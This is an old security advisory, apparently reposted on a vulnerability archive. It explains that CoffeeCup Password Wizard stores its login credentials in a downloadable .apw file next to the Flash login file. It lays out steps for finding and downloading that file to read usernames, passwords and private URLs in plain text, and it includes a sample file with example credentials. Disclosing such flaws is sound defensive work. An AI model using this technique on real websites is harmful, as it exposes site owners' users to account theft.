Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions

2007.10.20
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

+ Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions + Product: CoffeeCup Password Wizard All Versions + Vendor: CoffeeCup Software, Inc. + Site: http://www.coffeecup.com/java-password/ + About CoffeeCup Password Wizard: Create unlimited password protected pages with unlimited usernames and passwords with CoffeeCup Password Wizard. You don't even have to know Flash, Java, or HTML ! Customize the look and feel to match your page. You can even point different users to different URLs ! Preview within the program or your favorite browser. It's all that easy ! All this and more make CoffeeCup Password Wizard the easiest way to password protect your pages ! (??) + Description: Easy obtaining of names of users, passwords and a URL of direct access to the preferences of the same one. + Exploit: go to the login panel, see sourcecode HTML in search of the location of the file .swf used to make login. Example: Go to https://www.victim.com/billing/ See sourcecode, [...] ID=billing WIDTH=146 HEIGHT=125> <PARAM NAME=movie VALUE="billing.swf"> <PARAM NAME=quality VALUE=high> [...] (https://www.victim.com/billing/billing.swf) the file of the passwords is called just as the file of login, but with the extension .apw now, go to & download the file: https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password Wizard File) by I complete it opens east file with any text editor and found all the users with its passwords and the URL of direct access to its options. Example of passwords file: --------- billing.apw ----------- COFFEECUP PASSWORD WIZARD FILE WWW.COFFEECUP.COM PLEASE DO NOT EDIT!!!! MOVIE WIDTH:120 MOVIE HEIGHT:100 MOVIE FRAME RATE:0 MOVIE BK COLOR:$00ECECEC MOVIE DEFAULT URL: MOVIE DEFAULT FRAME: MOVIE SWF NAME:billing.swf MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis Webs\victim.com\new website project\billingMOVIE FONT NAME:MS Sans Serif MOVIE FONT SIZE:8 MOVIE FONT COLOR:clBlack MOVIE TRANSPARENT TRUE MOVIE VERTICAL TRUE USER BOX LEFT:2 USER BOX TOP:1 USER BOX WIDTH:116 USER BOX HEIGHT:34 USER BOX CAPTION:Username PASS BOX LEFT:2 PASS BOX TOP:36 PASS BOX WIDTH:116 PASS BOX HEIGHT:34 PASS BOX CAPTION:Password BUTTON LEFT:15 BUTTON TOP:78 BUTTON WIDTH:90 BUTTON HEIGHT:20 BUTTON PATH: BUTTON TX:1 BUTTON TY:1 ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm [...] END --------- billing.apw ----------- Example of user & pass on billing: user: anyweb pass: xnet0305 url option panel: https://www.victim.com/billing/anyweb0001.htm ---------------------------------------------------------------- [EOF] ----------------------------------------------- Credits: ToOcOoL (http://www.valenciahack.com/) ----------------------------------------------- -------------------------------- Note: sorry by my bad english ;) -------------------------------- -- XyB?rG WebMaster de: www.RZWEB.com.ar Powered By Dattatec.Com +++ GMX - Mail, Messaging & more http://www.gmx.net +++ Bitte lcheln! Fotogalerie online mit GMX ohne eigene Homepage!


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top